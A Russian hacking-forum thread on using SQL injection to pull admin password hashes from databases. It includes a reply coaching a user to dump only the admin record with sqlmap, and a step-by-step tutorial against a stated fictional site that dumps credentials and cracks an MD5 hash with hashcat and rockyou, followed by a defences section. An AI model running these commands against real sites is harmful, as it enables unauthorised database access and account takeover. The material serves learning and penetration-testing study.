HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 23.09.2018, 10:43
Rybinez
Новичок
Регистрация: 08.12.2016
Сообщений: 0
С нами: 4962585

Репутация: 0
По умолчанию

познавательно
Цитата:

AnnaDavydova сказал(а):

Обычный Hashcat не смог определить код для хэша DES. (не в меню справки). Однако оба cudaHashcat и oclHashcat нашли и взломали ключ

т. е. hashcat просто пропустил валидный пароль из словаря или что?

ааа, это перевод.. пардон
 
Ответить с цитированием

  #2  
Старый 03.10.2018, 11:42
Tihon49
Новичок
Регистрация: 10.01.2018
Сообщений: 0
С нами: 4389206

Репутация: 0
По умолчанию

Я вообще думал что cudahashcat и oclhashcat - это уже давно не рабочие инструменты, и что hashcat заменил их оба!!!
 
Ответить с цитированием

  #3  
Старый 08.10.2019, 13:07
s unity
Новичок
Регистрация: 18.09.2019
Сообщений: 0
С нами: 3502401

Репутация: 0
По умолчанию

подскажите, а если в базе данных более 10к пользователей?! можно каким то образом не дампить всех пользователей а именно админа? и как понять кто из них админ. что-то я не догоняю
 
Ответить с цитированием

  #4  
Старый 08.10.2019, 21:03
explorer
Новичок
Регистрация: 05.08.2018
Сообщений: 0
С нами: 4091032

Репутация: 0
По умолчанию

Цитата:

s unity сказал(а):

подскажите, а если в базе данных более 10к пользователей?! можно каким то образом не дампить всех пользователей а именно админа? и как понять кто из них админ. что-то я не догоняю
Конечно можно, самый простой способ это указать id в запросе, по-умолчанию id админа равен 1 (прошаренный админ сменит id, но это случается нечасто). Как-то так примерно:
SELECT * FROM login WHERE id=1
 
Ответить с цитированием

  #5  
Старый 08.10.2019, 21:31
s unity
Новичок
Регистрация: 18.09.2019
Сообщений: 0
С нами: 3502401

Репутация: 0
По умолчанию

Цитата:

explorer сказал(а):

Конечно можно, самый простой способ это указать id в запросе, по-умолчанию id админа равен 1 (прошаренный админ сменит id, но это случается нечасто). Как-то так примерно:
SELECT * FROM login WHERE id=1

Подскажи как указать это sqlmap? Я понял что за параметр, но как это протолкнуть в проге? И еше, админу могут держать свою инфу в недоступной для данного пользователя MySql?
 
Ответить с цитированием

  #6  
Старый 08.10.2019, 22:20
explorer
Новичок
Регистрация: 05.08.2018
Сообщений: 0
С нами: 4091032

Репутация: 0
По умолчанию

Цитата:

s unity сказал(а):

Подскажи как указать это sqlmap? Я понял что за параметр, но как это протолкнуть в проге? И еше, админу могут держать свою инфу в недоступной для данного пользователя MySql?

Очень просто:
sqlmap -u http://vulnsite.php?id=1 -D db_name --where="id=1" --dump

P.S. Встречаются ограничения в плане привилегий, когда текущий пользователь, например может получить названия таблиц и колонок, а записи из колонок нет. Ещё может быть 2 и более баз данных на сайте, и в текущей базе никаких вкусняшек нет, но они находятся в других базах .
 
Ответить с цитированием

  #7  
Старый 05.09.2020, 17:37
whoamikarate
Новичок
Регистрация: 13.08.2020
Сообщений: 0
С нами: 3026781

Репутация: 0
По умолчанию

Может ли лежать пароль от админки сайта в information_schema? или в базе данных?
 
Ответить с цитированием

  #8  
Старый 05.09.2020, 20:44
explorer
Новичок
Регистрация: 05.08.2018
Сообщений: 0
С нами: 4091032

Репутация: 0
По умолчанию

Цитата:

whoamikarate сказал(а):

Может ли лежать пароль от админки сайта в information_schema? или в базе данных?

Не может, а с вероятностью 99% именно в базе данных он и лежит. И с вероятностью более 90% он будет захеширован, то есть пароль находится не в открытом виде. Пример из дампа БД:

 
Ответить с цитированием

  #9  
Старый 01.07.2025, 01:02
Сергей Попов
Новичок
Регистрация: 14.08.2015
Сообщений: 0
С нами: 5656404

Репутация: 0
По умолчанию



Всем привет, античат !

Предыдущая часть: SQLMAP: гайд по SQL-инъекциям и обходу WAF (2025)

Подробный гайд, который часто просят новички. Разберём классический сценарий — эксплуатация SQL-инъекции с помощью связки SQLMap + Hashcat. Пройдём весь путь от получения структуры базы данных до взлома пароля.

Важно: всё, что вы увидите ниже — полностью вымышленный сценарий. URL, база данных и хеши созданы специально для этого руководства. Цель — научиться работать с инструментами, а не ломать реальные сайты. Помните об этике и законодательстве. Погнали!

Представим, что мы уже нашли уязвимый параметр на неком сайте. Наш старт — вот этот URL:
Код:
http://test-site.local/item.php?id=15
.
Шаг 1: Разведка. Узнаём столбцы в таблице
Код:
user_info
Первым делом нужно понять, какая структура у таблицы, где, как мы предполагаем, лежат данные пользователей. Наша цель — найти поля с логином и паролем в таблице
Код:
user_info
внутри базы
Код:
clemcoindustries
.

Команда:

Bash:


Код:
sqlmap -u
"http://test-site.local/item.php?id=15"
-D clemcoindustries -T user_info --columns
  • Код:
    -u
    — наш целевой URL. Берём его в кавычки, это хорошая привычка.
  • Код:
    -D
    — указываем имя базы данных, которое мы могли узнать на предыдущих этапах разведки.
  • Код:
    -T
    — конкретная таблица, которая нас интересует.
  • Код:
    --columns
    — команда, которая говорит SQLMap: «Эй, покажи-ка мне все столбцы из этой таблицы».
Что вернёт SQLMap:

Код:


Код:
[INFO] retrieved: user_id — int(10) unsigned
[INFO] retrieved: user_login — varchar(50)
[INFO] retrieved: user_password — varchar(255)
[INFO] retrieved: user_salt — varchar(16)
[INFO] retrieved: record_status — tinyint(4)
Отлично, столбцы
Код:
user_login
и
Код:
user_password
на месте. Это наши цели.
Шаг 2: Получаем имена пользователей
Теперь, когда мы знаем, где искать, давайте вытащим логины. Это полезно, чтобы убедиться, что в таблице вообще есть данные.

Bash:


Код:
sqlmap -u
"http://test-site.local/item.php?id=15"
-D clemcoindustries -T user_info -C user_login --dump
Тут всё знакомо, кроме двух флагов:
  • Код:
    -C user_login
    — говорим, что нам нужен только столбец с логинами.
  • Код:
    --dump
    — команда для извлечения (дампа) данных.
Примерный вывод:

Код:


Код:
Database: clemcoindustries
Table: user_info
[1 entry]
+------------+
| user_login |
+------------+
| admin      |
+------------+
Супер, у нас есть пользователь
Код:
admin
. Теперь самое интересное.
Шаг 3: Извлекаем хеш пароля
Действуем по аналогии, но теперь наша цель — столбец
Код:
user_password
.

Bash:


Код:
sqlmap -u
"http://test-site.local/item.php?id=15"
-D clemcoindustries -T user_info -C user_password --dump
Результат:

Код:


Код:
Database: clemcoindustries
Table: user_info
[1 entry]
+----------------------------------+
| user_password                    |
+----------------------------------+
| 202cb962ac59075b964b07152d234b70 |
+----------------------------------+
SQLMap, скорее всего, сам подскажет, что это похоже на хеш и предложит его взломать. Но мы сделаем это вручную, чтобы понять процесс.
Шаг 4: Определяем тип хеша
Что это за строка
Код:
202cb962ac59075b964b07152d234b70
? С опытом вы будете узнавать некоторые хеши «в лицо», но для надёжности воспользуемся утилитой из Kali Linux —
Код:
hash-identifier
.
Вводим наш хеш:

Код:


Код:
$ hash-identifier
HASH: 202cb962ac59075b964b07152d234b70
Possible Hashs :
[+] MD5
Как и предполагалось, это старый добрый MD5. Очень небезопасный по нынешним меркам, но всё ещё встречающийся в старых системах.
Шаг 5: Крашим хеш с помощью Hashcat
Финальный рывок. Создаём файл
Код:
hash.txt
и записываем в него наш хеш. Затем запускаем тяжёлую артиллерию — Hashcat.

Bash:


Код:
hashcat -m
0
-a
0
hash.txt /usr/share/wordlists/rockyou.txt
Разберём эту магию:
  • Код:
    -m 0
    — это код режима для MD5. Для каждого типа хеша у Hashcat есть свой код.
  • Код:
    -a 0
    — режим атаки. Ноль — это классический перебор по словарю (Straight).
  • Код:
    hash.txt
    — наш файл с хешем.
  • Код:
    /usr/share/wordlists/rockyou.txt
    — путь к знаменитому словарю. Если у вас его нет, обязательно установите.
Итог работы Hashcat:

Код:


Код:
202cb962ac59075b964b07152d234b70:abc123
Session..........: hashcat
Status...........: Cracked
...
Победа! Пароль —
Код:
abc123
.


Конечно, наш вымышленный пример был довольно простым. В реальных задачах всё бывает куда интереснее: фильтры, кастомное хеширование и многоуровневая защита. Чтобы увидеть, как похожие техники применяются на практике, очень советую почитать разборы (райтапы) с CTF. Там можно подсмотреть много полезных фишек.

Вот, например, пара свежих разборов веб-заданий от наших форумчан:Мораль и защита: что нужно знать
А теперь самое главное. Мы всё это делали не ради взлома, а чтобы понять, как защищаться.
  1. Не доверяйте данным. Всегда проверяйте команды и имена, которые вы используете. Опечатка в имени таблицы или столбца — и вы впустую потратите время.
  2. Хеширование — это не шифрование. Наш пример с MD5 идеально показывает, почему он плох. Его можно быстро взломать перебором по словарю. В 2025 году использовать MD5 для паролей — преступление. Смотрите в сторону bcrypt, scrypt или Argon2, которые являются адаптивными и требуют больших вычислительных ресурсов для взлома.
  3. Этика и закон. Ещё раз: все эти действия легальны только в рамках официального тестирования на проникновение (пентеста) или на собственных учебных стендах. На форуме
    Код:
    codeby.net
    мы за белый хакинг.
  4. Главная защита от SQL-инъекций.
    • Параметризованные запросы (Prepared Statements): Это основной и самый надёжный способ. Он разделяет код SQL-запроса и данные, не давая пользователю вмешаться в логику запроса.
    • ORM (Object-Relational Mapping): Фреймворки вроде Django, Ruby on Rails или Laravel используют ORM, которые в большинстве случаев автоматически создают безопасные запросы.
    • WAF (Web Application Firewall): Хороший дополнительный уровень защиты, который может отфильтровать вредоносные запросы ещё на подлёте.
    • Принцип наименьших привилегий: Учётная запись, от имени которой веб-приложение подключается к БД, не должна иметь прав на всю базу данных. Только на те таблицы и операции, которые ей реально нужны.
  5. Профессиональный рост. Понимание таких атак — это только первый шаг. Чтобы развиваться в пентесте и превратить это в профессию, нужен системный подход. Кстати, на античат есть отличная статья о том, как спланировать свой путь в эту сферу, особенно если вы переходите из другого IT-направления.
Итак, наш путь в пяти шагах:
  1. Разведали структуру таблицы через
    Код:
    --columns
    .
  2. Вытащили логин и хеш пароля с помощью
    Код:
    --dump
    .
  3. Определили тип хеша — MD5.
  4. Подобрали пароль (
    Код:
    abc123
    ) через Hashcat.
  5. Сделали выводы о том, как строить надёжную защиту.
Надеюсь, этот разбор был полезен. Если есть вопросы или хотите обсудить другие сценарии — пишите в комментариях!

Цитата:

Обновлено и дополнено командой античат на основе официальной документации sqlmap и практического опыта.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...